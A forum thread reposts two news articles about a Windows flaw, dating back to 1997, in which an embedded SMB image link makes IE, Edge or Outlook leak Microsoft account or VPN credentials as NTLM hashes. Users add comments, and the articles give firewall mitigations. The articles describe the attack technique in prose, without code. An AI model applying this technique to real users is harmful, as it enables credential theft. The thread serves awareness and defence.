Windows Flaw Reveals Microsoft Account Passwords, VPN Credentials

[Batu69]

Attack from the '90s resurfaces more deadly than before

   All the accounts a hacker could own via this exploit

 

A flaw in how Windows handles old authentication procedures for shared network resources can leak a user's Microsoft account username and password, or VPN credentials if the user is using a VPN to surf the Internet.

The exploit relies on an attacker embedding a link to an SMB resource (network share) inside a Web page or an email that gets viewed via Outlook.

The attacker can disguise the link to his network share inside image tags, but instead of the proper image link, he can place the link to a network share hosted on his own network.

Attack works via IE, Edge, or Outlook

When a user accessed the link via Internet Explorer, Edge, or Outlook, because of the way Windows handles authentication for network shares, the user's computer will automatically send the user's login credentials to authenticate on the crook's domain, even via the Internet.

While the Microsoft account password is not leaked in cleartext, but as an NTLM hash, researchers have proved a long time ago that these hashes can be easily cracked.

This isn't even something new, since Microsoft and the researcher community has known about this issue since 1997, and often discussed it at security conferences such as Black Hat.

While this wasn't a problem in the past since Windows accounts were using machine-localized usernames and passwords, beginning with Windows 8 and onward Microsoft started to allow users to authenticate on their computers with Microsoft accounts. In Windows 10, this became the de-facto standard authentication method, meaning more users started using it.

Attack can indirectly leak data for many other Microsoft resources

In recent years, Microsoft started linking all its online realties with the user's same Microsoft account. According to ValdikSS from ProstoVPN, this old attack now has new claws, allowing a crook to get his hands on credentials for Microsoft accounts that will indirectly also grant him access to all sorts of services like Skype, Xbox, OneDrive, Office 360, MSN, Bing, Azure and more.

Even worse, if the user is utilizing a VPN connection to load the corrupt SMB resource, than his VPN credentials get leaked instead, allowing the crook to access the victim's VPN account.

ValdikSS says the easiest way to protect oneself against such attacks is to block all outgoing SMB connections (port 445) via the Windows firewall, except for local networks.

But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.

 

 Proof-of-concept page showing the attack in action

 

Article source

 

Click here to open the demo site.

[steven36]

5 minutes ago, Batu69 said:

Attack works via IE, Edge, or Outlook

12 minutes ago, Batu69 said:

But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.

 

   =

[oliverjia]

I guess "flaws" like this are the reasons why I never used a MS account in all my PCs. Local account only. Cloud is the best way for hackers to get your credentials, for sure. In the computer world, more convenience = less security.  Remember that.

[mona]

Quote

community has known about this issue since 1997,

 

    

[zigzag]

They take back onedrive storage from regular users. They want cloud computing.

What a joke.

Now you can feel the power of Windows 10. You are more secure than ever.

[SPECTRUM]

I use local account, never trust in cloud accounts.

[vitorio]

I do not see there google drive.

[Petrovic]

What would you say if I told you that an almost two decade old vulnerability in Windows may leak your Microsoft Account credentials when you visit a website, read an email, or use VPN over IPSec?

 

A bug, that goes all the way back to Windows 95 is causing major issues on Windows 8 and Windows 10.

 

Basically, what happens is the following: Microsoft Edge, Internet Explorer, Outlook and other Microsoft products allow connections to local network shares. What the default settings don't prevent on top of that is connections to remote shares.

 

An attacker could exploit this by creating a website or email with an embedded image or other content that is been loaded from a network share.

Microsoft products like Edge, Outlook or Internet Explorer try to load the network share resource, and send the active user's Windows login credentials, username and password to that network share.

 

The username is submitted in plaintext, the password as a NTLMv2 hash.

Microsoft Account Credentials Leak vulnerability

 

There are two main issues that arise from that. First, the account data is exposed to third parties which may try cracking the hash to recover the user password.

Second, since account information leak, it may very well be a privacy issue especially if Tor or VPN services are used to improve privacy while on the Internet.

 

The reason why the attack is more promising under Windows 8 and newer is that Microsoft accounts are the default sign in option on those systems. This means that Microsoft account credentials are leaked to the network share, and not a local username and password.

A proof of concept web page is available which will test the underlying system to find out whether it is vulnerable or not. Please note that a successful attack will submit the Windows username and password to a third-party site. Click here to open the demo site.

Mitigation

The best course of action is to use third-party products instead of Microsoft products for the time being. While this may work in some situations, it won't in others.

The researchers who discovered the issue suggest to configure Windows Firewall in this case to protect against these attacks.

In addition to network perimeter firewalls, we therefore advocate for a host based hardening thanks to the Windows Firewall present in any Windows machine running at least Windows XP SP2. By enforcing egress filtering on ports 137/138/139/445 and dropping any IP packet leaving the host with a destination matching any of those ports and having a public IP as a target host, we offer a more consistent protection against those attacks.

Also, making sure that the password strength is sufficient to make brute force attacks less of an issue.

Article source

[Batu69]

Topic has been merged.